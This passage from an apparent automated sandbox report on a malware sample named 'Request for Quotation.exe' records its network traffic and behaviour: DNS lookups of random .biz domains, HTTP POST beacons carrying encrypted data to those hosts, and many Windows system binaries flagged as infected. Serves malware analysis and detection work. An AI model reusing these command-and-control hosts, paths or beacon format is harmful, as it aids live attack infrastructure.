                                      Dec 10, 2024 16:40:10.895766973 CET804973318.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:10.895788908 CET804973318.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:10.895873070 CET4973380192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:10.919502974 CET4973380192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:11.038990021 CET804973318.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:11.402822018 CET4973480192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:11.556876898 CET804973454.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:11.557121992 CET4973480192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:11.572777987 CET4973480192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:11.573009968 CET4973480192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:11.692307949 CET804973454.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:11.692483902 CET804973454.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:13.014575958 CET804973454.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:13.015690088 CET804973454.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:13.015747070 CET4973480192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:13.018258095 CET4973480192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:13.270334959 CET804973454.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:23.325246096 CET4974480192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:23.444936037 CET804974418.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:23.445749044 CET4974480192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:23.480609894 CET4974480192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:23.480894089 CET4974480192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:23.600174904 CET804974418.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:23.600234032 CET804974418.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:25.451215029 CET804974418.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:25.451267004 CET804974418.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:25.451366901 CET4974480192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:25.455255985 CET4974480192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:25.574666977 CET804974418.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:04.330681086 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:04.450449944 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:04.450917959 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:04.455202103 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:04.455202103 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:04.574637890 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:04.574661016 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:06.457366943 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:06.457386971 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:06.457451105 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:06.457508087 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:06.576885939 CET804990018.141.10.107192.168.2.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 10, 2024 16:40:03.220185995 CET6256353192.168.2.41.1.1.1
                                      Dec 10, 2024 16:40:03.939455986 CET53625631.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:06.573715925 CET5289353192.168.2.41.1.1.1
                                      Dec 10, 2024 16:40:06.814836979 CET53528931.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:07.914791107 CET6506053192.168.2.41.1.1.1
                                      Dec 10, 2024 16:40:08.397241116 CET53650601.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:08.457729101 CET6324653192.168.2.41.1.1.1
                                      Dec 10, 2024 16:40:08.697761059 CET53632461.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:22.227718115 CET53642331.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:25.770459890 CET53594341.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:26.009018898 CET53648341.1.1.1192.168.2.4
                                      Dec 10, 2024 16:42:06.458564997 CET4984353192.168.2.41.1.1.1
                                      Dec 10, 2024 16:42:06.995179892 CET53498431.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 10, 2024 16:40:03.220185995 CET192.168.2.41.1.1.10xe893Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:06.573715925 CET192.168.2.41.1.1.10x6a87Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:07.914791107 CET192.168.2.41.1.1.10xbaecStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:08.457729101 CET192.168.2.41.1.1.10xb684Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:42:06.458564997 CET192.168.2.41.1.1.10x59f3Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 10, 2024 16:40:03.939455986 CET1.1.1.1192.168.2.40xe893No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:06.814836979 CET1.1.1.1192.168.2.40x6a87No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:08.397241116 CET1.1.1.1192.168.2.40xbaecNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:08.697761059 CET1.1.1.1192.168.2.40xb684No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:22.227718115 CET1.1.1.1192.168.2.40xfdf1Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:25.770459890 CET1.1.1.1192.168.2.40x4d87Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:40:26.009018898 CET1.1.1.1192.168.2.40x9154Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:42:06.995179892 CET1.1.1.1192.168.2.40x59f3No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                      Dec 10, 2024 16:42:06.995179892 CET1.1.1.1192.168.2.40x59f3No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • pywolwnvd.biz
                                      • ssbzmoy.biz
                                      • cvgrf.biz
                                      • knjghuig.biz
                                      • vcddkls.biz

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973054.244.188.177806584C:\Users\user\Desktop\Request for Quotation.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 10, 2024 16:40:05.983470917 CET359OUTPOST /miswwsapbqmsir HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: pywolwnvd.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 824
                                      Dec 10, 2024 16:40:05.983470917 CET824OUTData Raw: 13 d4 56 ef 78 cf 26 81 2c 03 00 00 6e 96 61 2b b6 b5 78 18 fc 3f b8 04 f0 a5 45 e5 bf b5 13 b7 a2 65 1e c2 c1 93 9c e2 91 7b db 27 5b 45 8b 99 22 c0 b8 f7 00 61 06 1e d7 e6 8a ca 83 10 3a 16 97 68 dd 42 19 78 60 ae dc 53 6b 6a 49 1d c3 1a d7 d7
                                      Data Ascii: Vx&,na+x?Ee{'[E"a:hBx`SkjI:+&DD87Av.%m$p,D6]5x>Rs~q4^Ik[?@:_I+w0;{uNvsbd~s
                                      Dec 10, 2024 16:40:07.328208923 CET413INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:07 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=bdabc93c32c7affb78f030f3f2f07c1d|8.46.123.175|1733845207|1733845207|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.44973154.244.188.17780
                                      TimestampBytes transferredDirectionData
                                      Dec 10, 2024 16:40:07.069133043 CET356OUTPOST /hcwjealfbuy HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: pywolwnvd.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                      Dec 10, 2024 16:40:07.069181919 CET874OUTData Raw: ff 9a 72 1e f2 9c 18 68 5e 03 00 00 67 c5 f7 53 0d 60 76 52 98 07 53 95 4f 31 a9 2e e5 3f 30 63 e1 fe 73 88 07 e6 9c e4 28 dd 5d 55 71 55 34 4f ee 04 68 4c 9a 87 c8 5c ac 5c f9 da eb cf 32 e7 23 54 fc b0 a8 f4 14 91 6c ac 8e f0 ac 85 b6 0e 60 19
                                      Data Ascii: rh^gS`vRSO1.?0cs(]UqU4OhL\\2#Tl`zs7GXBd-LlHXJ.KbU-B4; Jze0)W^DvK5E]hRB1JSr[MQvze\ZhUqLDV&W^G5e?E
                                      Dec 10, 2024 16:40:08.358298063 CET413INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:08 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=ecb57a323d6a38489389066d3118b8a3|8.46.123.175|1733845208|1733845208|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.44973218.141.10.107806584C:\Users\user\Desktop\Request for Quotation.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 10, 2024 16:40:08.779573917 CET347OUTPOST /njrv HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: ssbzmoy.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 824
                                      Dec 10, 2024 16:40:08.779602051 CET824OUTData Raw: 69 aa a8 57 82 cc 37 0b 2c 03 00 00 4b 69 d3 6e b9 0b f6 e1 0e 05 7a 38 68 39 c1 52 eb 8f 04 b1 5a 0c 34 a2 57 c0 8b 76 5b a4 3f f7 38 ef cf b0 ff 51 95 ab 67 1a c4 53 76 fe bc e3 b6 8d b6 a7 0b f0 db 17 88 3a cf 50 72 02 b9 7a cf d0 4d ff 0a be
                                      Data Ascii: iW7,Kinz8h9RZ4Wv[?8QgSv:PrzM&h?3/aTZ`4v$0f{c&Z793y17Q(dLfAB*L.dS$Pl"XoHJJpz>^i2tI
                                      Dec 10, 2024 16:40:10.777882099 CET411INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:10 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=6eba07ba7a879f9d66656cb54dbea35c|8.46.123.175|1733845210|1733845210|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.44973318.141.10.10780
                                      TimestampBytes transferredDirectionData
                                      Dec 10, 2024 16:40:08.864067078 CET345OUTPOST /kr HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: ssbzmoy.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                      Dec 10, 2024 16:40:08.864188910 CET874OUTData Raw: 66 7a a3 ec f4 a6 de 3c 5e 03 00 00 db fc 2d 67 4a be 5f bf 48 86 ab cb 0c 14 b0 9d ec c0 c1 24 df 36 27 c6 b1 4f e9 39 7f ac 3f 68 f3 c9 04 f9 ce 1d c0 a8 af 6a 81 de a7 dd 02 ec 0f eb 2b 59 9a 07 36 14 2e f5 67 58 26 81 53 f3 25 19 a7 5f 39 d3
                                      Data Ascii: fz<^-gJ_H$6'O9?hj+Y6.gX&S%_9q _uI:g?7xM6V<+qba8C7/a?1Q{S)#ML+e3A=8"@Ty<_873;gBH;~uG6dfi':6P4Ze
                                      Dec 10, 2024 16:40:10.895766973 CET411INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:10 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=7f5a8d4c2fb8364d9c9f6faec536433a|8.46.123.175|1733845210|1733845210|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.44973454.244.188.17780
                                      TimestampBytes transferredDirectionData
                                      Dec 10, 2024 16:40:11.572777987 CET353OUTPOST /iropyruplkan HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: cvgrf.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                      Dec 10, 2024 16:40:11.573009968 CET874OUTData Raw: 93 98 c8 ac 1a 34 ac 1d 5e 03 00 00 c0 76 44 97 4e b5 70 bc f1 69 1f 3a 22 fb 94 76 4c 05 43 03 f2 c1 dd 76 29 48 bd ed 11 42 67 ad db 32 55 f7 9e d4 16 b5 fb b0 9e dd 31 96 ee f1 11 31 0a 52 18 2d af 6f 04 25 39 27 b0 9e 35 4c 8f f8 9e 9d ad 5c
                                      Data Ascii: 4^vDNpi:"vLCv)HBg2U11R-o%9'5L\1')dKBUcw/HlZh"|%}z4G?kS7pN28X^E[&oR=`/`]\$UZWcn\41(x}{X-e[U}
                                      Dec 10, 2024 16:40:13.014575958 CET409INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:12 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=48150c474575c0ebec51f0fb95754375|8.46.123.175|1733845212|1733845212|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.44974418.141.10.10780
                                      TimestampBytes transferredDirectionData
                                      Dec 10, 2024 16:40:23.480609894 CET353OUTPOST /hgpugagvc HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: knjghuig.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                      Dec 10, 2024 16:40:23.480894089 CET874OUTData Raw: d1 13 be 9e c7 a0 0a 18 5e 03 00 00 cd 95 bb ba 08 41 5a b5 00 89 36 9c 38 13 0c 22 26 75 d8 e1 de 69 c3 92 4e 28 60 51 a9 1e b8 0b ec 5a 2f d9 47 e3 24 d5 3b ce ce 15 d7 13 58 7e 70 af ab 29 50 c4 1b e0 94 b5 37 d0 2f 8f 32 f7 d6 e4 c9 aa 19 bc
                                      Data Ascii: ^AZ68"&uiN(`QZ/G$;X~p)P7/2s<O9jPqS)rQp- X 'hpKi}v*,DbJ=gD{Fd50m*xzczKd9+Y\B"MMmq
                                      Dec 10, 2024 16:40:25.451215029 CET412INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:25 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=6e69738ab52890a1bd33b43a8f86023d|8.46.123.175|1733845225|1733845225|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.44990018.141.10.10780
                                      TimestampBytes transferredDirectionData
                                      Dec 10, 2024 16:42:04.455202103 CET357OUTPOST /ytpebbldheutao HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: vcddkls.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                      Dec 10, 2024 16:42:04.455202103 CET874OUTData Raw: 9d 82 d8 77 aa 0d 5b bb 5e 03 00 00 21 a6 4c 82 c6 53 2c a9 4b 2b 56 79 92 08 1e 3d b2 84 d2 e9 40 19 68 99 75 c6 eb ef 5a b7 b1 45 05 7d 8a 40 0a 39 3a 79 4b 68 ea d7 78 97 6d c2 d5 c5 e5 a7 48 e8 7a f9 04 af 9d 1a 30 56 52 a1 27 a3 fc 58 be 11
                                      Data Ascii: w[^!LS,K+Vy=@huZE}@9:yKhxmHz0VR'X"!`Z$ObtAo rQ@[oM}ZCi%8Vh~#eJk&:)Ex{^b^Tp&U\?%&)r_gqs
                                      Dec 10, 2024 16:42:06.457366943 CET411INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:42:06 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=3d34cf6af452d2481d17e3e04270950d|8.46.123.175|1733845326|1733845326|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:10:40:01
                                      Start date:10/12/2024
                                      Path:C:\Users\user\Desktop\Request for Quotation.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Request for Quotation.exe"
                                      Imagebase:0x400000
                                      File size:1'795'584 bytes
                                      MD5 hash:FE6FB05450B37478070255DCF0A11654
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:10:40:01
                                      Start date:10/12/2024
                                      Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                      Imagebase:0x400000
                                      File size:1'658'880 bytes
                                      MD5 hash:68F239C01813FB34CDEBECC73B16EDE9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:2
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\alg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\alg.exe
                                      Imagebase:0x140000000
                                      File size:1'594'368 bytes
                                      MD5 hash:5814D242CD3F0A5096ACA78A36BA8FA8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:3
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\drivers\AppVStrm.sys
                                      Wow64 process (32bit):
                                      Commandline:
                                      Imagebase:
                                      File size:138'056 bytes
                                      MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                      Wow64 process (32bit):
                                      Commandline:
                                      Imagebase:
                                      File size:174'408 bytes
                                      MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:false

                                      General

                                      Target ID:5
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\drivers\AppvVfs.sys
                                      Wow64 process (32bit):
                                      Commandline:
                                      Imagebase:
                                      File size:154'952 bytes
                                      MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:false

                                      General

                                      Target ID:6
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\AppVClient.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\AppVClient.exe
                                      Imagebase:0x140000000
                                      File size:1'348'608 bytes
                                      MD5 hash:5DD1E83A36E68A7B8F2D74514F9AFFA1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:10:40:05
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\FXSSVC.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\fxssvc.exe
                                      Imagebase:0x140000000
                                      File size:1'242'624 bytes
                                      MD5 hash:4858CF6BC0503B39DCDAD51E994CDEF5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:10:40:07
                                      Start date:10/12/2024
                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                      Imagebase:0x140000000
                                      File size:2'354'176 bytes
                                      MD5 hash:50E9A4F9451FF8D2C576BF053A02B0D7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:11
                                      Start time:10:40:07
                                      Start date:10/12/2024
                                      Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                      Imagebase:0x140000000
                                      File size:1'725'440 bytes
                                      MD5 hash:3F3BEE4315081168FC542419E2F2D1A6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:10:40:07
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\msdtc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\msdtc.exe
                                      Imagebase:0x140000000
                                      File size:1'647'104 bytes
                                      MD5 hash:D8FC46BD67F795631C6DAD07E33247EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:13
                                      Start time:10:40:08
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                      Imagebase:0x140000000
                                      File size:1'604'608 bytes
                                      MD5 hash:65E45E0DE8536F3B14E886405F9D1C56
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:14
                                      Start time:10:40:08
                                      Start date:10/12/2024
                                      Path:C:\Windows\SysWOW64\perfhost.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWow64\perfhost.exe
                                      Imagebase:0x400000
                                      File size:1'519'616 bytes
                                      MD5 hash:E14C66701387555047BA9BBD23773B82
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:15
                                      Start time:10:40:08
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\Locator.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\locator.exe
                                      Imagebase:0x140000000
                                      File size:1'509'888 bytes
                                      MD5 hash:0EA212771D99ED9B59C38AC619AF79B7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:16
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\SensorDataService.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\SensorDataService.exe
                                      Imagebase:0x140000000
                                      File size:1'846'784 bytes
                                      MD5 hash:B7946E1BA775337FEE4E6785A5E67187
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
